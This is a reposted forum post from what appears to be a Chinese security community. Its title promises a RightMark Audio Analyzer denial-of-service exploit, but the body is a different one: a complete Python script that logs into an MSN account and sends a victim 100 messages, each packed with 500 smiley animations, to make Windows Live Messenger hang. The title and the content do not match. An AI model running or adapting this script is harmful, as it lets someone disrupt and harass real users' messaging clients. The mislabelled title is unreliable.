首页
社区
课程
招聘
[转帖][推荐]# Exploit Title: RightMark Audio Analyzer 6.2.3 (.sav , .sac) DoS
2010-8-12 12:43 3214

[转帖][推荐]# Exploit Title: RightMark Audio Analyzer 6.2.3 (.sav , .sac) DoS

2010-8-12 12:43
3214
# Exploit Title: Windows Live Messenger <= 14.0.8117 animation remote Denial of Service  

# Date: 11/08/2010  

# Software Link: http://explore.live.com/windows-live-messenger  

# Version: 14.0.8117 and prior  

# Tested on: Windows 7 x86  

   

# msnlib required: http://blitiri.com.ar/p/msnlib/  

# Greets: forums.hacking.org.il - <3UGUYS  

# SP. thx goes to Alberto <albertito [a7] blitiri [d0t] com [d0t] ar> for  

#              the msnlib library / Original msnbot example (that I modded =] )  

   

# Description:  

# Windows Live Messenger is prone to a Denial of Service attack. By sending  

# specially crafted messages that contain a large number of animations ("Smileys"),  

# it is possible to make WLM consume large amounts of memory and CPU while   

# it attempts to render the animated images, causing it to stop responding.  

   

import sys  

import time  

import select  

import socket  

import thread  

import msnlib  

import msncb  

   

payload = ":'(" * 500

   

m = msnlib.msnd()  

m.cb = msncb.cb()  

   

def do_work():  

    time.sleep(15)  

      

    for i in range(100):  

        print m.sendmsg(victim, payload)  

      

    time.sleep(30)  

    quit()  

   

   

try:  

    m.email = sys.argv[1]  

    m.pwd = sys.argv[2]  

    victim = sys.argv[3]  

except:  

    print "Usage: msnkeep.py account password victim_account"

    sys.exit(1)  

   

m.login()  

m.sync()  

   

m.change_status("online")  

   

def quit():  

    try:  

        m.disconnect()  

    except:  

        pass

    sys.exit(0)  

   

thread.start_new_thread(do_work, ())  

   

while 1:  

    t = m.pollable()  

    infd = t[0]  

    outfd = t[1]  

   

    try:  

        fds = select.select(infd, outfd, [], 0)  

    except:  

        quit()  

      

    for i in fds[0] + fds[1]:  

        try:  

            m.read(i)  

        except ('SocketError', socket.error), err:  

            if i != m:  

                m.close(i)  

            else:  

                quit()  

   

    time.sleep(0.01)

[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。

收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回